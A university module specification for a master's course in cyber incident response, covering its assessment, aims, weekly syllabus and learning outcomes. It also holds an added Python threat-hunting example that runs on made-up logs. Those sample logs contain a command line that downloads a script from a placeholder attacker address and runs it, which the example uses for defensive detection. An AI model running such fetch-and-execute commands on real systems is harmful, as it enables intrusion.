module specification

CC7007 - Cyber Incident Response (2024/25)

Module approved to run in 2024/25
Module title Cyber Incident Response
Module level Masters (07)
Credit rating for module 20
School School of Computing and Digital Media
Total study hours 200
100 hours Guided independent study
48 hours Scheduled learning & teaching activities
52 hours Assessment Preparation / Delivery
Assessment components

Type            Weighting  Qualifying mark  Description
In-Course Test  30%                         1-hour MCQ computer-based exam
Coursework      70%                         An investigative case study and a technical report of 2,000 words
Running in 2024/25

(Please note that module timeslots are subject to change)
Period           Campus  Day     Time     Module Leader
Spring semester  North   Monday  Morning

Module summary

This module provides students with a systematic theoretical and practical understanding of cyber incident response and handling across a wide range of scenarios. Incident response and threat-hunting activities are the key to identifying and observing cyber incidents, malware indicators and patterns of activity, and to generating accurate threat intelligence that can be used to detect current and future intrusions. Students will gain knowledge and a comprehensive understanding of incident response tactics and procedures. The module covers all phases of cyber incident response, from prevention and immediate response through mitigation to post-incident investigation to determine the root cause of a security breach. It addresses the growing demand for cybersecurity consultants and SOC analysts who monitor and maintain the security of public organisations and corporations, with a strong focus on virtualised environments in which students can practise incident response and malware/threat analysis to a professional standard. The module has the following learning aims:

1. To provide students with knowledge and skills to establish how and when a cyber attack happened and identify compromised and infected systems.

2. To instruct students in the tools and techniques that will allow them to identify and extract evidence from IT devices and cloud storage. 

3. To advance students’ skills to hunt down, identify, counter, and recover from a wide range of threats within enterprise networks, including APT nation-state adversaries, organized crime syndicates, and ransomware operators.

4. To contain and remediate incidents and hunt down additional breaches using knowledge of the adversary.
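As an added illustration of the workflow the summary and aims above describe (establish when a host was compromised, extract indicators from it, then use that knowledge of the adversary to hunt for further breaches), the following Python example is editorial material and not code from the module or its teaching resources. It runs on constructed sample data only: a made-up SSH authentication log and endpoint process log with placeholder hostnames, IP addresses and hash values. It normalises both sources into one time-ordered event list, extracts indicators from an analyst-confirmed incident window on one host while skipping hashes of known-good tooling (so the system's own download utility is not treated as malware), flags a password-guessing pattern, and re-applies the indicators across the remaining hosts.

```python
# Added editorial example (not module code): from confirmed incident to enterprise hunt.
# All telemetry is constructed: hostnames, IP addresses and 'sha256' values are made up.
import re
from datetime import datetime, timezone

# Constructed SSH authentication log (syslog-style lines, UTC timestamps).
AUTH_LOG = """\
2024-03-04T09:12:01Z host1 sshd[410]: Failed password for admin from 203.0.113.7 port 50122 ssh2
2024-03-04T09:12:03Z host1 sshd[410]: Failed password for admin from 203.0.113.7 port 50123 ssh2
2024-03-04T09:12:05Z host1 sshd[410]: Accepted password for admin from 203.0.113.7 port 50124 ssh2
2024-03-04T10:30:00Z host2 sshd[522]: Accepted publickey for deploy from 198.51.100.5 port 40000 ssh2
2024-03-04T11:02:10Z host2 sshd[523]: Accepted password for backup from 203.0.113.7 port 51000 ssh2
"""

# Constructed endpoint process log: timestamp|host|user|image hash|command line.
# The hash fields are short placeholders standing in for real SHA-256 digests.
PROC_LOG = """\
2024-03-04T09:13:40Z|host1|admin|sha256-curl-binary|curl -s http://203.0.113.7/x.sh -o /tmp/x.sh
2024-03-04T09:13:45Z|host1|admin|sha256-x-sh-script|bash /tmp/x.sh
2024-03-04T10:31:00Z|host2|deploy|sha256-systemctl|systemctl restart app
2024-03-04T11:03:00Z|host2|backup|sha256-x-sh-script|bash /tmp/.cache/x.sh
"""

AUTH_RE = re.compile(
    r"^(\S+) (\S+) sshd\[\d+\]: (Failed|Accepted) (\S+) for (\S+) from (\S+) port \d+")
IP_RE = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")


def parse_ts(value):
    """Parse an ISO-8601 'Z' timestamp into an aware UTC datetime."""
    return datetime.strptime(value, "%Y-%m-%dT%H:%M:%SZ").replace(tzinfo=timezone.utc)


def parse_events(auth_log, proc_log):
    """Normalise both sources into one list of event dicts, oldest first (the timeline)."""
    events = []
    for line in auth_log.splitlines():
        m = AUTH_RE.match(line)
        if m:
            ts, host, outcome, method, user, ip = m.groups()
            events.append({"ts": parse_ts(ts), "host": host, "source": "auth", "user": user,
                           "ip": ip, "method": method, "outcome": outcome.lower()})
    for line in proc_log.splitlines():
        ts, host, user, sha, cmd = line.split("|", 4)
        events.append({"ts": parse_ts(ts), "host": host, "source": "proc",
                       "user": user, "sha256": sha, "cmdline": cmd})
    return sorted(events, key=lambda e: e["ts"])


def extract_iocs(events, host, start, end, known_good=frozenset()):
    """Collect indicators seen on a confirmed-compromised host inside the incident window.

    Hashes listed in known_good (legitimate tooling the attacker merely used) are
    skipped so the later hunt is not swamped by benign matches on every host.
    """
    iocs = {"ips": set(), "sha256": set()}
    for e in events:
        if e["host"] != host or not (start <= e["ts"] <= end):
            continue
        if e["source"] == "auth":
            iocs["ips"].add(e["ip"])
        else:
            if e["sha256"] not in known_good:
                iocs["sha256"].add(e["sha256"])
            iocs["ips"].update(IP_RE.findall(e["cmdline"]))  # e.g. the download source
    return iocs


def password_guess_then_success(events, min_failures=2):
    """Behavioural pattern: a password login accepted after repeated failures from one IP."""
    failures, hits = {}, []
    for e in events:
        if e["source"] != "auth":
            continue
        key = (e["host"], e["ip"])
        if e["outcome"] == "failed":
            failures[key] = failures.get(key, 0) + 1
        elif e["method"] == "password" and failures.get(key, 0) >= min_failures:
            hits.append((e["ts"], e["host"], e["ip"], failures[key]))
    return hits


def hunt(events, iocs, exclude_host=None):
    """Re-apply the indicators across the other hosts; returns (event, reason) pairs."""
    flagged = []
    for e in events:
        if e["host"] == exclude_host:
            continue
        reasons = []
        if e.get("ip") in iocs["ips"]:
            reasons.append("known attacker IP " + e["ip"])
        if e.get("cmdline") and iocs["ips"] & set(IP_RE.findall(e["cmdline"])):
            reasons.append("command line references attacker IP")
        if e.get("sha256") in iocs["sha256"]:
            reasons.append("known malicious hash " + e["sha256"])
        if reasons:
            flagged.append((e, "; ".join(reasons)))
    return flagged


if __name__ == "__main__":
    evs = parse_events(AUTH_LOG, PROC_LOG)
    # Analyst-confirmed incident on host1 between 09:12 and 09:15 UTC.
    iocs = extract_iocs(evs, "host1", parse_ts("2024-03-04T09:12:00Z"),
                        parse_ts("2024-03-04T09:15:00Z"), known_good={"sha256-curl-binary"})
    print("IOCs:", iocs)
    print("Password guessing followed by success:", password_guess_then_success(evs))
    for e, why in hunt(evs, iocs, exclude_host="host1"):
        print("HUNT HIT", e["host"], e["ts"].isoformat(), why)
```

Run as-is, the hunt flags two events on host2 that the original incident scope did not include: a password login from the same source address and execution of the same script hash from a different path, which is exactly the "additional breach" the fourth aim refers to. The known-good filter matters in practice: without it, the hash of the legitimate download utility would be promoted to an indicator and match on every host that runs it.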

Syllabus

Week 1: Incident Response and Handling Basics

Week 2: Advanced Incident Response & Threat Hunting

Week 3: Cyber Intrusion Investigation

Week 4: Live Memory Forensics 1

Week 5: Live Memory Forensics 2

Week 6: Cyber Incident Timeline Analysis

Week 7: Network Traffic Analysis

Week 8: Malware analysis (code analysis, host/network analysis, reverse engineering, mobile and x86 architectures, machine code analysis, vulnerability analysis and sandboxed analysis)

Week 9: Advanced malware analysis (encoding methods, static/dynamic analysis, disassembly, obfuscation, behaviour analysis)

Week 10: Incident Response & Hunting Across the Enterprise

Week 11: Advanced Adversary and anti-forensics detection

Week 12: Exam (In-Course Test)

Balance of independent study and scheduled teaching activity

Students will develop theoretical understanding and practical investigative skills through weekly lectures, tutorials and supervised workshops. The workshops in particular give students hands-on experience of digital forensic investigation.


Appropriate blended learning approaches and technologies, such as the University’s VLE and industry-strength digital forensic tools, will be used to facilitate and support student learning, in particular, to:

• deliver content;

• encourage active learning;

• provide formative and summative assessments and prompt feedback; 

• enhance student engagement and learning experience.


Students will be expected and encouraged to produce reflective commentaries on the learning activities and tasks that they carry out to complete their work.

Learning outcomes

By the end of this module students should be able to:

LO1. Demonstrate advanced knowledge and practical skills in cyber incident response and handling, including the security and digital forensic principles and methods that underpin incident response and malware analysis.

LO2. Demonstrate a deep and critical understanding of the theory and practice of computer, mobile, IoT and cloud forensics.

LO3. Apply the tools, techniques and procedures needed to hunt, detect and contain a variety of adversaries and to remediate incidents.

LO4. Use memory analysis, incident response and threat-hunting tools to detect hidden processes, malware, attacker command lines, rootkits and network connections, and to hunt and perform incident response across systems.

LO5. Recover data removed by anti-forensic techniques and use the collected evidence to perform effective remediation.

Bibliography